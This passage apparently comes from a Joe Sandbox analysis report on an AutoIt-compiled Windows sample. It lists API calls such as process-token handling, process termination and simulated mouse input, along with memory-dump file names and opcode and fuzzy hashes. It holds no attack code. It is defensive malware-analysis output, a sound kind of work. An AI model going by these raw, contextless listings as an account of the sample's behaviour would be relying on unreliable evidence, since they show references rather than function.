                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00EF0617
                      • RegCloseKey.ADVAPI32(00000000), ref: 00EF0624
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                      • String ID:
                      • API String ID: 4046560759-0
                      • Opcode ID: 05979ea06e9ff53feeb2ffc3f47eafbf38aa7a258df47a7810db149ea58aae01
                      • Instruction ID: 86457dff544992663e5165cc0102a3c212c0432117c9e61274acd208a2751a24
                      • Opcode Fuzzy Hash: 05979ea06e9ff53feeb2ffc3f47eafbf38aa7a258df47a7810db149ea58aae01
                      • Instruction Fuzzy Hash: 0D515C31208204AFCB14EF54C885E6FBBE9FF84314F04995DF699A72A2DB71E905CB52
                      APIs
                      • GetMenu.USER32(?), ref: 00EF5A82
                      • GetMenuItemCount.USER32(00000000), ref: 00EF5AB9
                      • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00EF5AE1
                      • GetMenuItemID.USER32(?,?), ref: 00EF5B50
                      • GetSubMenu.USER32(?,?), ref: 00EF5B5E
                      • PostMessageW.USER32(?,00000111,?,00000000), ref: 00EF5BAF
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Menu$Item$CountMessagePostString
                      • String ID:
                      • API String ID: 650687236-0
                      • Opcode ID: 30bd4133a5dea36eda217f4bf1a87f3bb73910716310fb8c06aaf2b713b7702a
                      • Instruction ID: 76778880648d8c89d5eca813102daca1107fc69a6a4c8b1299faed80fa0ac80f
                      • Opcode Fuzzy Hash: 30bd4133a5dea36eda217f4bf1a87f3bb73910716310fb8c06aaf2b713b7702a
                      • Instruction Fuzzy Hash: 60516C36A00A19AFCF15DF64C845ABEB7F4EF58320F1054A9EA15B7351DB30AE41CB90
                      APIs
                      • VariantInit.OLEAUT32(?), ref: 00ECF3F7
                      • VariantClear.OLEAUT32(00000013), ref: 00ECF469
                      • VariantClear.OLEAUT32(00000000), ref: 00ECF4C4
                      • _memmove.LIBCMT ref: 00ECF4EE
                      • VariantClear.OLEAUT32(?), ref: 00ECF53B
                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00ECF569
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Variant$Clear$ChangeInitType_memmove
                      • String ID:
                      • API String ID: 1101466143-0
                      • Opcode ID: 38633e829a3658198458d97982a19b8cf699ce4dba0464bbd892c93816e36114
                      • Instruction ID: f997d498c462ca7590d056fe1cf2ba65fea28bc8ea08f6a6ac055dde6b0b2af4
                      • Opcode Fuzzy Hash: 38633e829a3658198458d97982a19b8cf699ce4dba0464bbd892c93816e36114
                      • Instruction Fuzzy Hash: 5D516CB5A00209DFCB14CF58D880EAAB7B9FF4C314B158569ED59EB300D731E916CBA0
                      APIs
                      • _memset.LIBCMT ref: 00ED2747
                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00ED2792
                      • IsMenu.USER32(00000000), ref: 00ED27B2
                      • CreatePopupMenu.USER32 ref: 00ED27E6
                      • GetMenuItemCount.USER32(000000FF), ref: 00ED2844
                      • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00ED2875
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                      • String ID:
                      • API String ID: 3311875123-0
                      • Opcode ID: 1201d9d66cff68cf9a74e6726c97d68d68b9ae06cf890e0cea228c163bbc3d80
                      • Instruction ID: dd56ba3e98ac0ce4025484064cc9baba4e66ddce2d75f2dc51ea7c5d9572ed76
                      • Opcode Fuzzy Hash: 1201d9d66cff68cf9a74e6726c97d68d68b9ae06cf890e0cea228c163bbc3d80
                      • Instruction Fuzzy Hash: 7B519F74A00205DFDF28CF68D888AADBBF5EF64318F10526EE611BB390D7719906DB51
                      APIs
                        • Part of subcall function 00E72612: GetWindowLongW.USER32(?,000000EB), ref: 00E72623
                      • BeginPaint.USER32(?,?,?,?,?,?), ref: 00E7179A
                      • GetWindowRect.USER32(?,?), ref: 00E717FE
                      • ScreenToClient.USER32(?,?), ref: 00E7181B
                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00E7182C
                      • EndPaint.USER32(?,?), ref: 00E71876
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: PaintWindow$BeginClientLongRectScreenViewport
                      • String ID:
                      • API String ID: 1827037458-0
                      • Opcode ID: 496f0c11e52a9540a25755da18eef72396a1a20f08cbf405223c37010b9b64aa
                      • Instruction ID: e219a1c4d3cc6517893a18f6a35312483c57050f27538babfaa9cc6ef14b64c5
                      • Opcode Fuzzy Hash: 496f0c11e52a9540a25755da18eef72396a1a20f08cbf405223c37010b9b64aa
                      • Instruction Fuzzy Hash: 0B419471104304AFD710DF29CC84FBA7BE9EF4A724F148669F598EB2A2C7319845DB62
                      APIs
                      • ShowWindow.USER32(00F367B0,00000000,01775850,?,?,00F367B0,?,00EFB862,?,?), ref: 00EFB9CC
                      • EnableWindow.USER32(00000000,00000000), ref: 00EFB9F0
                      • ShowWindow.USER32(00F367B0,00000000,01775850,?,?,00F367B0,?,00EFB862,?,?), ref: 00EFBA50
                      • ShowWindow.USER32(00000000,00000004,?,00EFB862,?,?), ref: 00EFBA62
                      • EnableWindow.USER32(00000000,00000001), ref: 00EFBA86
                      • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00EFBAA9
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Window$Show$Enable$MessageSend
                      • String ID:
                      • API String ID: 642888154-0
                      • Opcode ID: 491f0a6df60e67e8c509c70c6e458439e7694d506eb25cbaf6f9a06911fa503f
                      • Instruction ID: e06649308c71dc6c34ed21c276bedc4ce7c71a789ddd4a2e3ac34e3ca9e906c6
                      • Opcode Fuzzy Hash: 491f0a6df60e67e8c509c70c6e458439e7694d506eb25cbaf6f9a06911fa503f
                      • Instruction Fuzzy Hash: D9417130600649AFDB21CF15C889BB57BE0FF45318F1852B9EB58AF6A2C771E845CB50
                      APIs
                      • GetForegroundWindow.USER32(?,?,?,?,?,?,00EE5134,?,?,00000000,00000001), ref: 00EE73BF
                        • Part of subcall function 00EE3C94: GetWindowRect.USER32(?,?), ref: 00EE3CA7
                      • GetDesktopWindow.USER32 ref: 00EE73E9
                      • GetWindowRect.USER32(00000000), ref: 00EE73F0
                      • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00EE7422
                        • Part of subcall function 00ED54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00ED555E
                      • GetCursorPos.USER32(?), ref: 00EE744E
                      • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00EE74AC
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                      • String ID:
                      • API String ID: 4137160315-0
                      • Opcode ID: f818e34be2b49585d72db383fdaa6e7433eacfd9aada9c95f6b9c525050a1b43
                      • Instruction ID: 554b9e48d0e987f218eccc6954d24dc3868d54db6c6b0be4ee9942befefffb94
                      • Opcode Fuzzy Hash: f818e34be2b49585d72db383fdaa6e7433eacfd9aada9c95f6b9c525050a1b43
                      • Instruction Fuzzy Hash: 1931E672508349AFD720DF15D849F9BBBE9FF88314F00191AF599A7191DB30E909CB92
                      APIs
                        • Part of subcall function 00EC85F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00EC8608
                        • Part of subcall function 00EC85F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00EC8612
                        • Part of subcall function 00EC85F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00EC8621
                        • Part of subcall function 00EC85F1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00EC8628
                        • Part of subcall function 00EC85F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00EC863E
                      • GetLengthSid.ADVAPI32(?,00000000,00EC8977), ref: 00EC8DAC
                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00EC8DB8
                      • HeapAlloc.KERNEL32(00000000), ref: 00EC8DBF
                      • CopySid.ADVAPI32(00000000,00000000,?), ref: 00EC8DD8
                      • GetProcessHeap.KERNEL32(00000000,00000000,00EC8977), ref: 00EC8DEC
                      • HeapFree.KERNEL32(00000000), ref: 00EC8DF3
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                      • String ID:
                      • API String ID: 3008561057-0
                      • Opcode ID: 913fffaad12f01926d640f3ae05091933d94ecd09b189b94e927bdff5b8c58ae
                      • Instruction ID: 4b7e8857ce6132637f22573cf370121f4aca548a2f40784677d22116e2256641
                      • Opcode Fuzzy Hash: 913fffaad12f01926d640f3ae05091933d94ecd09b189b94e927bdff5b8c58ae
                      • Instruction Fuzzy Hash: D811CD32901604FFDB108B65CF08FBE7BADEF8031AF10412DE846A3251CB329905CB60
                      APIs
                      • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00EC8B2A
                      • OpenProcessToken.ADVAPI32(00000000), ref: 00EC8B31
                      • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00EC8B40
                      • CloseHandle.KERNEL32(00000004), ref: 00EC8B4B
                      • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00EC8B7A
                      • DestroyEnvironmentBlock.USERENV(00000000), ref: 00EC8B8E
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                      • String ID:
                      • API String ID: 1413079979-0
                      • Opcode ID: 2d6618a4e566e26f35b2327737c2cba1baa138e3316670956a1436c4a94e2195
                      • Instruction ID: 01550aa2a3868cca9d9e9e275c9c133d23b7df490a5b472cddf11dd1316ed857
                      • Opcode Fuzzy Hash: 2d6618a4e566e26f35b2327737c2cba1baa138e3316670956a1436c4a94e2195
                      • Instruction Fuzzy Hash: F0115CB6501209AFDF018FA5DE49FEA7BA9EF48308F045069FE04B2160C7729D65DB60
                      APIs
                        • Part of subcall function 00E712F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00E7134D
                        • Part of subcall function 00E712F3: SelectObject.GDI32(?,00000000), ref: 00E7135C
                        • Part of subcall function 00E712F3: BeginPath.GDI32(?), ref: 00E71373
                        • Part of subcall function 00E712F3: SelectObject.GDI32(?,00000000), ref: 00E7139C
                      • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00EFC1C4
                      • LineTo.GDI32(00000000,00000003,?), ref: 00EFC1D8
                      • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00EFC1E6
                      • LineTo.GDI32(00000000,00000000,?), ref: 00EFC1F6
                      • EndPath.GDI32(00000000), ref: 00EFC206
                      • StrokePath.GDI32(00000000), ref: 00EFC216
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                      • String ID:
                      • API String ID: 43455801-0
                      • Opcode ID: 86ec6051efcd3ab564fd734f462a8fa8ba460e73fe1d60b0d4fa54656fcf6f26
                      • Instruction ID: 44b688d13b20a6b446358b9b66ac988828615a5e341820b719ad4a70e12fef54
                      • Opcode Fuzzy Hash: 86ec6051efcd3ab564fd734f462a8fa8ba460e73fe1d60b0d4fa54656fcf6f26
                      • Instruction Fuzzy Hash: 9B111E7640014CBFEF119F95DC88EAA7FADEF08354F148021FA1896171C7719D59DBA0
                      APIs
                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00E903D3
                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 00E903DB
                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00E903E6
                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00E903F1
                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 00E903F9
                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E90401
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Virtual
                      • String ID:
                      • API String ID: 4278518827-0
                      • Opcode ID: d7faefcf82d3c4e8fac2094a321488d2cedb56e81882856c536745781cdedf33
                      • Instruction ID: 4c69ff03713e93cd0a3626b6e629d664384f0ef561bd4e1738ead46a11ce0ad0
                      • Opcode Fuzzy Hash: d7faefcf82d3c4e8fac2094a321488d2cedb56e81882856c536745781cdedf33
                      • Instruction Fuzzy Hash: CF016CB09017597DE3008F5A8C85B52FFA8FF59354F00411BE15C87941C7F5A868CBE5
                      APIs
                      • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00ED569B
                      • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00ED56B1
                      • GetWindowThreadProcessId.USER32(?,?), ref: 00ED56C0
                      • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00ED56CF
                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00ED56D9
                      • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00ED56E0
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                      • String ID:
                      • API String ID: 839392675-0
                      • Opcode ID: eb4834b874bf09661cd9ccc038021cc0a49dfb130c57c09eb853c431201c7912
                      • Instruction ID: c8a83844d3149217fa10289ecfd537514fcd0f1d4e4590729898e6d8914860ba
                      • Opcode Fuzzy Hash: eb4834b874bf09661cd9ccc038021cc0a49dfb130c57c09eb853c431201c7912
                      • Instruction Fuzzy Hash: 8DF06D32241118BFE3205BA39C0DEFF7A7CEFC6B11F000169FA04E11519AA05A05C6B5
                      APIs
                      • InterlockedExchange.KERNEL32(?,?), ref: 00ED74E5
                      • EnterCriticalSection.KERNEL32(?,?,00E81044,?,?), ref: 00ED74F6
                      • TerminateThread.KERNEL32(00000000,000001F6,?,00E81044,?,?), ref: 00ED7503
                      • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00E81044,?,?), ref: 00ED7510
                        • Part of subcall function 00ED6ED7: CloseHandle.KERNEL32(00000000,?,00ED751D,?,00E81044,?,?), ref: 00ED6EE1
                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 00ED7523
                      • LeaveCriticalSection.KERNEL32(?,?,00E81044,?,?), ref: 00ED752A
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                      • String ID:
                      • API String ID: 3495660284-0
                      • Opcode ID: 587d0d76b686b268b3de61b4b6302b655e69fd65ad9ed051d57a377db5c10c29
                      • Instruction ID: c73b3d7ca5aeeff471cbbb411a727af1e29398c169fcdfd7455e0ca3a0dab404
                      • Opcode Fuzzy Hash: 587d0d76b686b268b3de61b4b6302b655e69fd65ad9ed051d57a377db5c10c29
                      • Instruction Fuzzy Hash: 43F05E3A540612EFEB111B65FC8C9FB7B2AEF85302B401532F602B11B1DB755906CB50
                      APIs
                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00EC8E7F
                      • UnloadUserProfile.USERENV(?,?), ref: 00EC8E8B
                      • CloseHandle.KERNEL32(?), ref: 00EC8E94
                      • CloseHandle.KERNEL32(?), ref: 00EC8E9C
                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00EC8EA5
                      • HeapFree.KERNEL32(00000000), ref: 00EC8EAC
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                      • String ID:
                      • API String ID: 146765662-0
                      • Opcode ID: 7f25f09363862a0a528cfbc553dbbd763c7b18fbac58d785313f70516199c14b
                      • Instruction ID: 5f6692e81d5d25afdd62524bd14063b5a6238b9034e4ab285ee684a5dc4a5087
                      • Opcode Fuzzy Hash: 7f25f09363862a0a528cfbc553dbbd763c7b18fbac58d785313f70516199c14b
                      • Instruction Fuzzy Hash: 47E0C237005002FFDA012FE2EC0C92ABF69FFC9322B548231F219A10B1CB329428DB50
                      APIs
                      • VariantInit.OLEAUT32(?), ref: 00EE8928
                      • CharUpperBuffW.USER32(?,?), ref: 00EE8A37
                      • VariantClear.OLEAUT32(?), ref: 00EE8BAF
                        • Part of subcall function 00ED7804: VariantInit.OLEAUT32(00000000), ref: 00ED7844
                        • Part of subcall function 00ED7804: VariantCopy.OLEAUT32(00000000,?), ref: 00ED784D
                        • Part of subcall function 00ED7804: VariantClear.OLEAUT32(00000000), ref: 00ED7859
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Variant$ClearInit$BuffCharCopyUpper
                      • String ID: AUTOIT.ERROR$Incorrect Parameter format
                      • API String ID: 4237274167-1221869570
                      • Opcode ID: c03e1a45c0adb4e8827dce1a089d3666b0fb4a15a899e5f915d642bd597ff5b0
                      • Instruction ID: 17894da0a46245f810098a216296188bbe5454fc67b73166b03604901a7ab1be
                      • Opcode Fuzzy Hash: c03e1a45c0adb4e8827dce1a089d3666b0fb4a15a899e5f915d642bd597ff5b0
                      • Instruction Fuzzy Hash: 3691BC75A083459FC700DF25C58096ABBE4EFC8314F04996EF89EAB362DB31E905CB52
                      APIs
                        • Part of subcall function 00E8FEC6: _wcscpy.LIBCMT ref: 00E8FEE9
                      • _memset.LIBCMT ref: 00ED3077
                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00ED30A6
                      • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00ED3159
                      • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00ED3187
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
